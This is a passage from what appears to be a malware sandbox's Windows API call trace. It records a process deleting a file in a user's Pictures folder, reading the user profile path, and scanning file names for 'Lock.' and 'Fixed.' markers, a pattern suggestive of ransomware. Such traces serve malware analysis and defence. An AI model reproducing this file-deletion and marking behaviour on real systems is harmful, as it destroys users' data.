(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a74bf0 [0211.866] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/W9bUf5L8kEVKE-hdQ.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\W9bUf5L8kEVKE-hdQ.png", lpFilePart=0x8cedf4*="W9bUf5L8kEVKE-hdQ.png") returned 0x2e [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0211.866] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\W9bUf5L8kEVKE-hdQ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\w9buf5l8kevke-hdq.png")) returned 0x20 [0211.866] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\W9bUf5L8kEVKE-hdQ.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19ceef0, ftCreationTime.dwHighDateTime=0x1d5d782, ftLastAccessTime.dwLowDateTime=0x38c01930, ftLastAccessTime.dwHighDateTime=0x1d5d214, ftLastWriteTime.dwLowDateTime=0x38c01930, ftLastWriteTime.dwHighDateTime=0x1d5d214, nFileSizeHigh=0x0, nFileSizeLow=0x110e2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="W9bUf5L8kEVKE-hdQ.png", cAlternateFileName="W9BUF5~1.PNG")) returned 0x9e2078 [0211.867] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\W9bUf5L8kEVKE-hdQ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\w9buf5l8kevke-hdq.png")) returned 1 [0211.869] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19ceef0, ftCreationTime.dwHighDateTime=0x1d5d782, ftLastAccessTime.dwLowDateTime=0x38c01930, ftLastAccessTime.dwHighDateTime=0x1d5d214, ftLastWriteTime.dwLowDateTime=0x38c01930, ftLastWriteTime.dwHighDateTime=0x1d5d214, nFileSizeHigh=0x0, nFileSizeLow=0x110e2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="W9bUf5L8kEVKE-hdQ.png", cAlternateFileName="W9BUF5~1.PNG")) returned 0 [0211.869] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0211.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.869] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.870] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.870] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a74df8 [0211.872] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/W9bUf5L8kEVKE-hdQ.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\W9bUf5L8kEVKE-hdQ.png", lpFilePart=0x8cf650*="W9bUf5L8kEVKE-hdQ.png") returned 0x2e [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74df8 | out: hHeap=0x2af0000) returned 1 [0211.872] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\W9bUf5L8kEVKE-hdQ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\w9buf5l8kevke-hdq.png")) returned 0xffffffff [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.872] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0211.872] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.872] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wi_9DL5txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i_9DL5txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_9DL5txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9DL5txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DL5txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="txr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xr1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IbTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bTGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TGlf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Glf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lf8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0211.873] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa6370 [0211.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wi_9DL5txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i_9DL5txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_9DL5txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9DL5txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DL5txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="txr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xr1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IbTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bTGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TGlf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Glf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lf8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63a8 [0211.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63a8 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0211.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0211.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.875] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.876] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0211.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 